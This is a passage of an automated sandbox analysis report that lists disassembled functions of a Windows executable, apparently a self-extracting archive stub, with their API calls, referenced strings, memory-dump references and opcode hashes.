Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: 27c31bd432865d1c06c620264fd7a800adb954397a58d88bbdff87a358d93223
Instruction ID: f378be62fb107a8f98efb689210a37569e32f98730822d4e8d0ebc4e67eb32c5
Opcode Fuzzy Hash: 27c31bd432865d1c06c620264fd7a800adb954397a58d88bbdff87a358d93223
Instruction Fuzzy Hash: AF01D671342A211B0F312FB82C9579E27CCEA0271932C057BFDA1C3140F721C9479B98

Function 00C7D13C Relevance: 9.1, APIs: 6, Instructions: 86COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00C7D160
_memcmp.LIBVCRUNTIME ref: 00C7D177

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: e15ca834b51fb3d603fd0148c25dfb57e545bdfbbc8ffbaea748fee41214fe14
Instruction ID: 58cb88de1ac29fff96ac1254766de8cce5a257e23e3d522649814b3469a47925
Opcode Fuzzy Hash: e15ca834b51fb3d603fd0148c25dfb57e545bdfbbc8ffbaea748fee41214fe14
Instruction Fuzzy Hash: 9121357164010ABBDB00AA11CD81F7FF77C9F90B68F55C128FD0A96246E261DE459791

Function 00C8B122 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00C872DC,?,00000000,?,00C86E7B,00000200,00000000,?), ref: 00C8B126
_free.LIBCMT ref: 00C8B159
_free.LIBCMT ref: 00C8B181
SetLastError.KERNEL32(00000000,00000000,?), ref: 00C8B18E
SetLastError.KERNEL32(00000000,00000000,?), ref: 00C8B19A
_abort.LIBCMT ref: 00C8B1A0

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 01b6762bf09e478a698866a87b745cea5a13e19300859b4ba027a375026d3589
Instruction ID: 39734f507ddd50566a1ec447fad194ba33e652c11056337e58a9ae46bfaf923e
Opcode Fuzzy Hash: 01b6762bf09e478a698866a87b745cea5a13e19300859b4ba027a375026d3589
Instruction Fuzzy Hash: 5FF02835100B01B6E21233746C5EF2F22298FC176CB34002AF525DA191FF208E02A37D

Function 00C806E6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 00C71180: GetDlgItem.USER32(00000000,00003021), ref: 00C711C4
Part of subcall function 00C71180: SetWindowTextW.USER32(00000000,00C95294), ref: 00C711DA

EndDialog.USER32(?,00000001), ref: 00C80731
GetDlgItemTextW.USER32(?,00000066,00000800), ref: 00C80747
SetDlgItemTextW.USER32(?,00000065,?), ref: 00C80761
SetDlgItemTextW.USER32(?,00000066), ref: 00C8076C

Strings

RENAMEDLG, xrefs: 00C806FE

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 84ff8812fda91f33e1c3b03d30d6cc0e3c4cf0b2bfca74476b15fda53d1d1296
Instruction ID: 02b6ab48e43055a8da5305a844e91a966a8691b86300297e939337ad859a28bb
Opcode Fuzzy Hash: 84ff8812fda91f33e1c3b03d30d6cc0e3c4cf0b2bfca74476b15fda53d1d1296
Instruction Fuzzy Hash: 1B01F5325402187AE6106BB9AD49F7F7B6CE746B45F20041DF301A60D0C6A6BD099B75

Function 00C89838 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00C897E9,?,?,00C89789,?,00C9C7E0,0000000C,00C898E0,?,00000002), ref: 00C89858
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C8986B
FreeLibrary.KERNEL32(00000000,?,?,?,00C897E9,?,?,00C89789,?,00C9C7E0,0000000C,00C898E0,?,00000002,00000000), ref: 00C8988E

Strings

mscoree.dll, xrefs: 00C89851
CorExitProcess, xrefs: 00C89863

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b55327f83424deb73f2923a3b095469f787ea960f0468d32c2c37f7c3e23516e
Instruction ID: f3c0108413ebd4ac8f7a13ad0c10019ef9e4bee12741bf7510496501d1585cca
Opcode Fuzzy Hash: b55327f83424deb73f2923a3b095469f787ea960f0468d32c2c37f7c3e23516e
Instruction Fuzzy Hash: D0F0A431510618FBCB11AF60DC0DBAEBFB8EB45715F0402A9F805A21A0DB305A41CB94

Function 00C74C41 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00C75E92: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00C75EAD
Part of subcall function 00C75E92: LoadLibraryW.KERNELBASE(?,?,00C74C54,Crypt32.dll,?,00C74CD6,?,00C74CBA,?,?,?,?), ref: 00C75ECF

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00C74C60
GetProcAddress.KERNEL32(00CA6CA0,CryptUnprotectMemory), ref: 00C74C70

Strings

CryptProtectMemory, xrefs: 00C74C5A
CryptUnprotectMemory, xrefs: 00C74C66
Crypt32.dll, xrefs: 00C74C4A

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 76ec96d534c71fcfce6fcc11a548f0e46c1a6313504ccd8c2ec6ebdb1dfcdea0
Instruction ID: e197d57d57e15192bda03a4d17ad0b94b9a4b491ebcb0e9ee914cd48201be55b
Opcode Fuzzy Hash: 76ec96d534c71fcfce6fcc11a548f0e46c1a6313504ccd8c2ec6ebdb1dfcdea0
Instruction Fuzzy Hash: EBE046B0941F42BEDF035B34A80CB08FFA47B10B40F04C66AE06882260DBF5D061CB90

Function 00C8A049 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00C8A0BB
_free.LIBCMT ref: 00C8A0DB

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 68d3862abbfef5e514afc5c771ebf5d7b2bedac0a40d16dd23c76dbeeeae0882
Instruction ID: 3142316f76cd6b64d79403b33e2b1db3d8e132f4327f0c89c72cf49ccfb4db93
Opcode Fuzzy Hash: 68d3862abbfef5e514afc5c771ebf5d7b2bedac0a40d16dd23c76dbeeeae0882
Instruction Fuzzy Hash: D1411732A003009FDB24EF78C885A5DB3F6EF88718F15416AE516EB391D731AE42DB85

Function 00C8D79A Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00C8D7A3
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C8D7C6

Part of subcall function 00C8A838: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C87012,?,0000015D,?,?,?,?,00C87B91,000000FF,00000000,?,?), ref: 00C8A86A

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C8D7EC
_free.LIBCMT ref: 00C8D7FF
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C8D80E

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 51b67f406fce8effc460150d1036b3766dc2410a97489ebf58078ec828f2dfee
Instruction ID: 56f3e8023dc6ca1a1eedd02b467c86b29946e11a655fb75020579576850459ba
Opcode Fuzzy Hash: 51b67f406fce8effc460150d1036b3766dc2410a97489ebf58078ec828f2dfee
Instruction Fuzzy Hash: 140188726016157B2721367A5C8CD7F6F6DDAC6B58314012AF915C7184EA608E01D3F5

Function 00C8B1A6 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,?,00C8AC47,00C8A91B,?,00C8B150,00000001,00000364,?,00C86E7B,00000200,00000000,?), ref: 00C8B1AB
_free.LIBCMT ref: 00C8B1E0
_free.LIBCMT ref: 00C8B207
SetLastError.KERNEL32(00000000,00000000,?), ref: 00C8B214
SetLastError.KERNEL32(00000000,00000000,?), ref: 00C8B21D

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 66cf2cfadb745e9d935172071796288d3564ca75504490bc47b460cfe91cd6c7
Instruction ID: a277ad4eb2ceb596b577cbff756ac1bec935ce4c9c72e622064d9f361253d02c
Opcode Fuzzy Hash: 66cf2cfadb745e9d935172071796288d3564ca75504490bc47b460cfe91cd6c7
Instruction Fuzzy Hash: 4501F436280A00B7A21277756C9EB2F262D9FD477C731002BF515D6293FF249E01A36D

Function 00C8E058 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00C8E070

Part of subcall function 00C8A7FE: RtlFreeHeap.NTDLL(00000000,00000000,?,00C8E0EF,00000000,00000000,00000000,00000000,?,00C8E116,00000000,00000007,00000000,?,00C8E513,00000000), ref: 00C8A814
Part of subcall function 00C8A7FE: GetLastError.KERNEL32(00000000,?,00C8E0EF,00000000,00000000,00000000,00000000,?,00C8E116,00000000,00000007,00000000,?,00C8E513,00000000,00000000), ref: 00C8A826

_free.LIBCMT ref: 00C8E082
_free.LIBCMT ref: 00C8E094
_free.LIBCMT ref: 00C8E0A6
_free.LIBCMT ref: 00C8E0B8

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d6cb2e28dff69602039c0b719c7eb2e1d37923bfc16acd01a63f0dc7e86b1eaf
Instruction ID: d4c175a43af9b05364a2f5826905d791ced2f385cc805452e7d4e6310691907a
Opcode Fuzzy Hash: d6cb2e28dff69602039c0b719c7eb2e1d37923bfc16acd01a63f0dc7e86b1eaf
Instruction Fuzzy Hash: 90F04932544214BBD630FBA8EAC6E0A77E9EA043187A50C1AF018D7540CB70FE81AB69

Function 00C8A298 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00C8A2B6

Part of subcall function 00C8A7FE: RtlFreeHeap.NTDLL(00000000,00000000,?,00C8E0EF,00000000,00000000,00000000,00000000,?,00C8E116,00000000,00000007,00000000,?,00C8E513,00000000), ref: 00C8A814
Part of subcall function 00C8A7FE: GetLastError.KERNEL32(00000000,?,00C8E0EF,00000000,00000000,00000000,00000000,?,00C8E116,00000000,00000007,00000000,?,00C8E513,00000000,00000000), ref: 00C8A826

_free.LIBCMT ref: 00C8A2C8
_free.LIBCMT ref: 00C8A2DB
_free.LIBCMT ref: 00C8A2EC
_free.LIBCMT ref: 00C8A2FD

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 586c07660711560fa90b4f460e958a927394552497e4efd7a63450f799e2af55
Instruction ID: 939b3246c99872ab83b7282ed14a26c81ead0f6c69e83a7c8dd0b49d11759856
Opcode Fuzzy Hash: 586c07660711560fa90b4f460e958a927394552497e4efd7a63450f799e2af55
Instruction Fuzzy Hash: D2F05470913110BFAB11BFA8BD9174D37B1FB4872834D011BF81597271EB350A81EB86

Function 00C89933 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\owKQ0b029a.exe,00000104), ref: 00C89973
_free.LIBCMT ref: 00C89A3E
_free.LIBCMT ref: 00C89A48

Strings

C:\Users\user\Desktop\owKQ0b029a.exe, xrefs: 00C8996A, 00C89971, 00C899A0, 00C899D8

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\owKQ0b029a.exe
API String ID: 2506810119-2882507503
Opcode ID: 774bec4fac931223a0ebd995e2693113284428f117020d38b0f08e5467158623
Instruction ID: 1e667adcd31a762b71b147ebf624be3318d5b546f292eba2dba04bf2555621ea
Opcode Fuzzy Hash: 774bec4fac931223a0ebd995e2693113284428f117020d38b0f08e5467158623
Instruction Fuzzy Hash: 67318E71A05218BFDB25FB99DC81AAEBBFCEB85318F18406BE80497210D7704E40EB55

Function 00C7F798 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

CharUpperW.USER32(?,?,?,?,00001000), ref: 00C7F7F0
CharUpperW.USER32(?,?,?,?,?,00001000), ref: 00C7F817

Strings

-, xrefs: 00C7F7DE

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: CharUpper
String ID: -
API String ID: 9403516-2547889144
Opcode ID: 5fa25267a89257ff8f2ac3b5536ae9f034a878bd75b4ad07a81979d4fe42f5bc
Instruction ID: 345f44cb1772eadf2be41c32de281d0a8fa6f78bce3cdc9371f9936cba255290
Opcode Fuzzy Hash: 5fa25267a89257ff8f2ac3b5536ae9f034a878bd75b4ad07a81979d4fe42f5bc
Instruction Fuzzy Hash: 5E21E57240830555D325DB798889B7F6FA89782314F00C83FF5ACD20D1DAB4CA86D273

Function 00C7E50A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00C71180: GetDlgItem.USER32(00000000,00003021), ref: 00C711C4
Part of subcall function 00C71180: SetWindowTextW.USER32(00000000,00C95294), ref: 00C711DA

EndDialog.USER32(?,00000001), ref: 00C7E558
GetDlgItemTextW.USER32(?,00000065,?,00000080), ref: 00C7E570
SetDlgItemTextW.USER32(?,00000066,?), ref: 00C7E59E

Strings

GETPASSWORD1, xrefs: 00C7E523

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: 3cfa011a8a06447b2252d4e37f0dd5e2eb4db2a2d26f6d8e460f25771b4794c9
Instruction ID: abd6584d9a6e480afa293be0bd01e43fb733e64f25ed8cfd4e50fae8fe09a5aa
Opcode Fuzzy Hash: 3cfa011a8a06447b2252d4e37f0dd5e2eb4db2a2d26f6d8e460f25771b4794c9
Instruction Fuzzy Hash: 0B11A13390012C7ADB219AA99D4DFFE3B6CEB4D754F0480A5FA8DE6080E661DE019761

Function 00C731A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00C731C7

Part of subcall function 00C736D0: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C736E3

_wcschr.LIBVCRUNTIME ref: 00C731E5
_wcschr.LIBVCRUNTIME ref: 00C731F5

Strings

%c:\, xrefs: 00C731BD

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: 322061f544366dbc8ac07f06b5b1150fd8a006fd45c4f3098f1d4390f98b8cb7
Instruction ID: f7c07763c897fa3deac595f379cc2db3ef74c83621a2d49817dc06031a211196
Opcode Fuzzy Hash: 322061f544366dbc8ac07f06b5b1150fd8a006fd45c4f3098f1d4390f98b8cb7
Instruction Fuzzy Hash: 3401F5235047527A9A21773A9C46C6BA7ACEF86770750C41AF858C2083EA20DA50A2B6

Function 00C80D43 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

RENAMEDLG, xrefs: 00C80D9E
REPLACEFILEDLG, xrefs: 00C80D88, 00C80DBA

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: cfe6fb1398566d5a00fe3fb10ae7f20536a2e80a34256892e6cb98b9721f1900
Instruction ID: 0f9961491203707fd634351c108b6441a887f6802623aa908c1e16ac6741e1ef
Opcode Fuzzy Hash: cfe6fb1398566d5a00fe3fb10ae7f20536a2e80a34256892e6cb98b9721f1900
Instruction Fuzzy Hash: 3801D471504201AFCB50EB99EC80B2EBBDCE745399F21053AF452E2230D632AC6CDB65

Function 00C73CBC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00C73CCB
FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 00C73CDA

Strings

RTL, xrefs: 00C73CD3, 00C73CD8, 00C73D0C
LTR, xrefs: 00C73CEA, 00C73CF5, 00C73CFE

Memory Dump Source

